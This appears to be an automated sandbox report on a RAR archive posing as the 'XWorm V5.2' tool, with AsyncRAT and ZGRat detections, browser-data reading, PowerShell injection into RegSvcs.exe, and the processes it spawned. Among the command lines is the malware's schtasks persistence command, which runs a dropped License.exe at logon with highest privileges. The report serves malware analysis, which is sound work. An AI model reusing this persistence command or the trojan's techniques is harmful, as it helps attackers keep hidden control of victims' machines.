Analysis Overview
Threat Level: Known bad
The file http://gff was found to be: Known bad.
Malicious Activity Summary
ZGRat
Detect ZGRat V1
AsyncRat
Async RAT payload
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Reads user/profile data of web browsers
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Enumerates system info in registry
NTFS ADS
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-11 12:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-11 12:05
Reported
2024-04-11 12:35
Platform
win11-20240214-en
Max time kernel
1768s
Max time network
1801s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C3632A\XWormLoader 5.1 x64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NEW.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C6EA5A\crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\License.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C1FF7A\ConsoleApp1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C0FC8A\ConsoleApp1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C4FADA\XWorm V5.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04CA372E\XWormLoader 5.1 x64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NEW.EXE | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C4FADA\XWorm V5.2.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4748 set thread context of 4928 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 4700 set thread context of 788 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 3456 set thread context of 3504 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2567984660-2719943099-2683635618-1000\{77274673-D791-4D40-B9FA-196C352C1F4C} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C3632A\XWormLoader 5.1 x64.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C6EA5A\crack.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C1FF7A\ConsoleApp1.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04CA372E\XWormLoader 5.1 x64.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm.V5.2.rar:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04CF9089\XWormLoader 5.1 x64.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C0FC8A\ConsoleApp1.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C4FADA\XWorm V5.2.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\License.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://gff
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbf52e3cb8,0x7ffbf52e3cc8,0x7ffbf52e3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3504 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5704 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5280 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6704 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7096 /prefetch:8
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\XWorm.V5.2.rar"
C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe"
C:\Users\Admin\AppData\Local\Temp\7zO04C3632A\XWormLoader 5.1 x64.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C3632A\XWormLoader 5.1 x64.exe"
C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE
"C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE"
C:\Users\Admin\AppData\Local\Temp\NEW.EXE
"C:\Users\Admin\AppData\Local\Temp\NEW.EXE"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "License" /tr '"C:\Users\Admin\AppData\Roaming\License.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4C0E.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "License" /tr '"C:\Users\Admin\AppData\Roaming\License.exe"'
C:\Users\Admin\AppData\Local\Temp\7zO04C6EA5A\crack.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C6EA5A\crack.exe"
C:\Users\Admin\AppData\Roaming\License.exe
"C:\Users\Admin\AppData\Roaming\License.exe"
C:\Users\Admin\AppData\Local\Temp\7zO04C1FF7A\ConsoleApp1.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C1FF7A\ConsoleApp1.exe"
C:\Users\Admin\AppData\Local\Temp\7zO04C0FC8A\ConsoleApp1.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C0FC8A\ConsoleApp1.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\7zO04C4FADA\XWorm V5.2.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C4FADA\XWorm V5.2.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7992 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7452 /prefetch:1
